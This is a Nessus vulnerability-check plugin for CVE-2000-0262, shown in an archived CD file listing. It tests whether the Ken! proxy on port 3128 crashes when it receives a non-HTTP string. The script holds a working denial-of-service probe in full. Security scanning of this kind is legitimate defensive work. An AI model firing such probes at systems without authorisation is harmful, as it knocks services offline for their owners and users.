home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / ken_segfault.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  80 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10375);
  10.  script_bugtraq_id(1103);
  11.  script_version ("$Revision: 1.9 $");
  12.  script_cve_id("CVE-2000-0262");
  13.  name["english"] = "Ken! DoS";
  14.  name["francais"] = "DΘni de service contre Ken!";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. It was possible to make the remote service 
  19. (very likely Ken! proxy software)
  20. crash by sending a non-http request to this port.
  21.  
  22. In the case of the Ken! proxy, this attack can only
  23. performed from inside the LAN.
  24.  
  25.  
  26. Solution : contact your vendor for a fix
  27. Risk factor : High";
  28.  
  29.  desc["francais"] = "
  30. Il est possible de faire planter le service
  31. distant (probablement le proxy Ken!)
  32. en lui envoyant une requete non-http.
  33.  
  34. Dans le cas du proxy Ken! cette attaque n'est
  35. effective que si elle est lancΘe α partir de
  36. l'interieur du LAN.
  37.  
  38. Solution : contactez votre vendeur pour un patch
  39. Facteur de risque : ElevΘ";
  40.  
  41.  
  42.  script_description(english:desc["english"], francais:desc["francais"]);
  43.  
  44.  summary["english"] = "Ken! Segmentation fault";
  45.  summary["francais"] = "Erreur de segmentation dans Ken!";
  46.  script_summary(english:summary["english"], francais:summary["francais"]);
  47.  
  48.  script_category(ACT_DENIAL);
  49.  
  50.  
  51.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  52.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  53.  family["english"] = "Denial of Service";
  54.  family["francais"] = "DΘni de service";
  55.  script_family(english:family["english"], francais:family["francais"]);
  56.  script_dependencie("find_service.nes");
  57.   script_require_ports(3128);
  58.  exit(0);
  59. }
  60.  
  61. #
  62. # The script code starts here
  63. #
  64.  
  65. port = 3128;
  66. if(get_port_state(port))
  67. {
  68.  data = string("Whooopppss_Ken_died\r\n");
  69.  soc = open_sock_tcp(port);
  70.  if(soc > 0)
  71.  {
  72.   send(socket:soc, data:data);
  73.   close(soc);
  74.   
  75.   soc2 = open_sock_tcp(port);
  76.   if(!soc2)security_hole(port);
  77.   else close(soc2);
  78.  }
  79. }
  80.